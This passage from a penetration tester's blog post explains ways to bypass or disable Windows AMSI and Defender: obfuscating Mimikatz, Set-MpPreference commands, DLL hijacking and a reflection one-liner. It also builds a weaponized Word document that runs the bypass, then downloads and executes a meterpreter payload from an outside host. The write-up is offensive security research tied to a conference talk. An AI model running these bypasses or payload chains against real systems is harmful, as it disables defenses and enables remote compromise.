<b>Executing scripts without using powershell.exe -</b> Using separate runspace (<a href="https://github.com/Cn33liz/p0wnedShell">p0wnedshell</a>, <a href="https://github.com/jaredhaight/PSAttack">psattack</a>) and using System.Automation.Dll (<a href="https://github.com/Ben0xA/nps">nps</a>, <a href="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick">Powerpick</a>) <br />
<br />
<b>Unusual Storage</b> - Scripts loaded from WMI namespaces, Registry Keys and Event Logs. <br />
<br />
<b>Application whitelisting bypass methods</b> - InstallUtil, regsrv32 and rundll32<br />
<br />
All of the techniques were detected by AMSI! While the detection was no surprise given that AMSI steps in at the script host level, still, this looked intimidating! More so because Windows Defender supports AMSI by default on Windows 10. I quickly started looking for different ways to avoid or bypass AMSI. Turned out that there are bunch of techniques that can be used to bypass or avoid AMSI.<br />
<br />
<h4 style="text-align: left;">
Bypass or Avoid AMSI </h4>
<br />
<b>Force use PowerShell v2</b>: PowerShell v2 doesn't support AMSI at the time of writing. If .Net 3.0 is available on a target Windows 10 machine - which is not default - PowerShell v2 can be started with the -Version option.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM5e8_7N_h23jULICrPZ5UwLIurYTUTp_G8Ng2dx_oe2lzlsUP6LrQIWRhnM8ihZvWtHgKKTxxJ91cVMzM5b-od_LqNKlJk6h6l3iSvRlFKFL6n96st6a-u6BiNjHq_wG6OHtYZPxV0fw/s1600/PSv2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM5e8_7N_h23jULICrPZ5UwLIurYTUTp_G8Ng2dx_oe2lzlsUP6LrQIWRhnM8ihZvWtHgKKTxxJ91cVMzM5b-od_LqNKlJk6h6l3iSvRlFKFL6n96st6a-u6BiNjHq_wG6OHtYZPxV0fw/s400/PSv2.jpg" width="400" /></a></div>
<br />
<div style="text-align: left;">
<b>Obfuscation </b></div>
Another interesting way is to change the signature of the PowerShell script so that the AntiVirus to which AMSI submits our script doesn't detect it as malicious. To play with the signatures Windows Defender have for scripts, lets play with one of the scripts from Nishang, Gupt-Backdoor, which gets detected as malicious by AMSI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkyvKW6n-sDKPS26rPkaHfh623frh4v-zyGyRsFkw1LJK7iIS-m1BdRBMUGQBjCgF5FansJ2uOCg_mBbqtvYRoXVuL3c9zLHAOf3WtVZsKH7PUwcJAk_xgY2Votab8BycAizZ5YeEivQ/s1600/Gupt_Backdoor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkyvKW6n-sDKPS26rPkaHfh623frh4v-zyGyRsFkw1LJK7iIS-m1BdRBMUGQBjCgF5FansJ2uOCg_mBbqtvYRoXVuL3c9zLHAOf3WtVZsKH7PUwcJAk_xgY2Votab8BycAizZ5YeEivQ/s400/Gupt_Backdoor.jpg" width="400" /></a></div>
<br />
Lets remove the help section, all the functionality and replace the function and variable names with random strings.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6F1TrFGXhZG5_jDklQ_OP4-KxDmP_EWITixZQ-2J5mGTrt1iRIYXl3SO5dLOaB6bi1ZIz_0w03Mi2QHkqFbEXtXbrnnWnnjrLfRsWfyicQKmsRkm9Bdex18cCknDCAYB_IEBMF1lThyphenhyphen8/s1600/Gupt_modified.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6F1TrFGXhZG5_jDklQ_OP4-KxDmP_EWITixZQ-2J5mGTrt1iRIYXl3SO5dLOaB6bi1ZIz_0w03Mi2QHkqFbEXtXbrnnWnnjrLfRsWfyicQKmsRkm9Bdex18cCknDCAYB_IEBMF1lThyphenhyphen8/s320/Gupt_modified.jpg" width="320" /></a></div>
<br />
And the result is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wqZBHMlmEGNpySGIo8kjK5gCvADjjXhavt1X-PqTLy_c0Tpm6Ub5DuRDqtv9Y9xiZd8ovSAhoL-LUzeMIykhG127LrFb4DlIIWDwtb5bSwDABk3QTV133E28VRCpzX1LbKCPH9ARXdE/s1600/Gupt_modified_undetected.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wqZBHMlmEGNpySGIo8kjK5gCvADjjXhavt1X-PqTLy_c0Tpm6Ub5DuRDqtv9Y9xiZd8ovSAhoL-LUzeMIykhG127LrFb4DlIIWDwtb5bSwDABk3QTV133E28VRCpzX1LbKCPH9ARXdE/s400/Gupt_modified_undetected.jpg" width="400" /></a></div>
<br />
Apparently, among other things, Windows Defender looks for specific function and variable names. Actually, this should not be a surprise as I know of few antiviruses which use Twitter handles of PowerShell hackers as a signature. <br />
<br />
Manual obfuscation of a huge script such as Invoke-Mimikatz could not be done manually. Fortunately, the obfuscate functionality of the awesome <a href="http://www.powertheshell.com/isesteroids2-2/">ISE-Steroids module</a> is very effective! Lets obfuscate Invoke-Mimikatz from Nishang. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh1s8CaR5Bye0UngynCTTvOn_CQ1vJ1zZCM8-wOMK1IXCleSnEyd628G_Un3RS0Z0dSA0CpegNsme8-COrkccH1vEYNzP_Aq2_CL3yRVu2RzDz2sUjjpE3c0os_woFXCCbOusg-ewwJM/s1600/obfuscate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh1s8CaR5Bye0UngynCTTvOn_CQ1vJ1zZCM8-wOMK1IXCleSnEyd628G_Un3RS0Z0dSA0CpegNsme8-COrkccH1vEYNzP_Aq2_CL3yRVu2RzDz2sUjjpE3c0os_woFXCCbOusg-ewwJM/s400/obfuscate.jpg" width="400" /></a></div>
Now, when the obfuscated version is loaded, there is no detection.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIyycCKKkz6dWyN22nTdiu8x4Q0lgbz-GUzZjM2O2d7D7YuVnyFhGC2PIsbhX_Fxk5GnrybT_XQ4xWO5GScLf0jC9MnNK9wXqUfOvqyw4LTsEQfv9VI6zeFZaYA9Mb10tErGW8_weC2-A/s1600/inoke-mimikatz-obfuscated.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIyycCKKkz6dWyN22nTdiu8x4Q0lgbz-GUzZjM2O2d7D7YuVnyFhGC2PIsbhX_Fxk5GnrybT_XQ4xWO5GScLf0jC9MnNK9wXqUfOvqyw4LTsEQfv9VI6zeFZaYA9Mb10tErGW8_weC2-A/s400/inoke-mimikatz-obfuscated.jpg" width="400" /></a></div>
Bingo!<br />
<br />
Make sure that the function calls are made from the script before obfuscation. <br />
This is very interesting! As per the articles mentioned at beginning of this post, AMSI has additional calls if any sort of obfuscation, even base64, is used in the script.This obfuscation getting past AMSI has been a sort of mystery for me.This probably has more to do with the signatures available with Windows Defender than with AMSI. I welcome comments on this specific thing as I am unable to understand why Invoke-Mimikatz was not detected if the plain de-obfuscated code was submitted to AMSI. <br />
<br />
<div style="text-align: left;">
<b>Unload AMSI</b></div>
<div style="text-align: left;">
<br /></div>
<b>Set-MpPreference</b><br />
This built-in cmdlet can be used to make AMSI ineffective by disabling protection offered by Windows Defender. <br />
<br />
Below command can be used to disable real time monitoring for Windows Defender<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
</textarea></pre>
There are some 'gotchas' with the technique though:<br />
<ul style="text-align: left;">
<li>A notification is shown to the user </li>
<li>Needs to be run from an elevated shell</li>
<li>Event ID 5001 (Microsoft-Windows-Windows Defender/Operational) - Windows Defender Real-Time Protection was disabled.</li>
</ul>
Another command can be used, this is useful for avoiding detection of in-memory download execute one liner. <br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableIOAVProtection $true
</textarea></pre>
This command doesn't show any notification to the user but:<br />
<ul style="text-align: left;">
<li>An elevated shell is still required and;</li>
<li>Event ID 5004 (Microsoft-Windows-Windows Defender/Operational) - Windows Defender Real-Time Protection feature (IE Downloads and Outlook Express attachments) configuration has changed. </li>
</ul>
<b>DLL Hijacking - Method used in p0wnedshell</b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Cornelis de Plaa (@Cneelis) discovered this brilliant method and implemented it in his awesome <a href="https://github.com/Cn33liz/p0wnedShell">p0wnedshell</a>. There is a <a href="http://cn33liz.blogspot.com/2016/05/bypassing-amsi-using-powershell-5-dll.html">detailed blog post about the method</a>. It is a DLL hijacking method where amsi.dll is dropped in the current working directory while loading the p0wnedshell runspace. The dll is loaded by the runspace and exits immediately to unload AMSI. <b></b><br />
<span id="goog_1432847639"></span><span id="goog_1432847640"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv0xAhp8qCVOd5ZT5ondP2i7P8HyTWpumN56YWxES1yHjNDUWDocQ7KUiCyQy_X2EBsOnIz1DUmTuIXnAnipiNJcwpCof5YD0qxB4aJoN23GK9Du_5HS0b7-mxTnbc4SauUwyf3IXGZX0/s1600/p0wnedshell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv0xAhp8qCVOd5ZT5ondP2i7P8HyTWpumN56YWxES1yHjNDUWDocQ7KUiCyQy_X2EBsOnIz1DUmTuIXnAnipiNJcwpCof5YD0qxB4aJoN23GK9Du_5HS0b7-mxTnbc4SauUwyf3IXGZX0/s400/p0wnedshell.jpg" width="400" /></a></div>
So p0wnedshell successfully bypasses AMSI. But there is another interesting part of the security mechanism, PowerShellv5 supports automatic script block logging. The scripts loaded by p0wnedshell generate Event ID 4104 (Microsoft-Windows-PowerShell/Operational) – Suspicious script block logging (due to successful loading of scripts in memory). <br />
<br />
<b>Reflection - Matt Graeber's method</b><br />
Matt Graeber (@mattifestation) <a href="https://twitter.com/mattifestation/status/735261176745988096">tweeted</a> an awesome one line AMSI bypass. Like many other things by Matt, this is my favorite. It <u>doesn't need elevated shell</u> and there is no notification to the user but the automatic script block logging, like in the case of p0wnedshell, generates Event ID 4104. Turns out that it is the script block logging which is the real headache. There are a bunch of script logging bypasses I am aware of, discovered by other PowerShell hackers, but not public yet.<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
</textarea></pre>
<br />
Anyway, I like this method because it can be used with existing PowerShell script execution methods.<br />
For example, lets bypass AMSI using a client side attack and get a meterpreter on the target Windows 10 box. Lets generate a weaponized MS Word document using Nishang's Out-Word and instruct it to download and execute a PowerShell meterpreter. <br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\test> Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true);iex(New-Object Net.WebClient).DownloadString(''http://192.168.230.1/msfpayload.ps1'')' -RemainSafe
</textarea></pre>
As soon as a target opens the Word file and click on "Enable Content", this happens:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0KTAIpUG4qFk9SJyi0nRAKUT4dgKmT9ULBc7j0i0rM0vl53MlMyFcpInG0h2Z2282rcY8fRhyphenhyphen-e2FnNFT7KPlj85BBc0zMQUYpoocktXuJgEDNfbX1F3RveKRlerwRiBaGDPfy7OzNaA/s1600/meterpreter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0KTAIpUG4qFk9SJyi0nRAKUT4dgKmT9ULBc7j0i0rM0vl53MlMyFcpInG0h2Z2282rcY8fRhyphenhyphen-e2FnNFT7KPlj85BBc0zMQUYpoocktXuJgEDNfbX1F3RveKRlerwRiBaGDPfy7OzNaA/s400/meterpreter.jpg" width="400" /></a></div>
Sweet! We bypassed AMSI in a client side attack!<br />
<br />
AMSI is certainly not the security silver bullet which many organizations (wrongly) keep looking for but it is indeed an improvement in Windows security. <br />
<br />
My slides for the Black Hat preso are here:<br />
<a href="http://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it">http://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it</a><br />
<iframe allowfullscreen="" frameborder="0" height="385" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/8fdAuBGhvNXZ1o" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="https://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it" target="_blank" title="AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It">AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div>
<br />
Hope this was useful. Please leave feedback and comments!<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com3tag:blogger.com,1999:blog-8135211063584500909.post-17838503193071669202016-05-25T00:49:00.000+05:302018-01-14T22:48:14.753+05:30Practical use of JavaScript and COM Scriptlets for Penetration Testing<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<a href="data:image/png;base64,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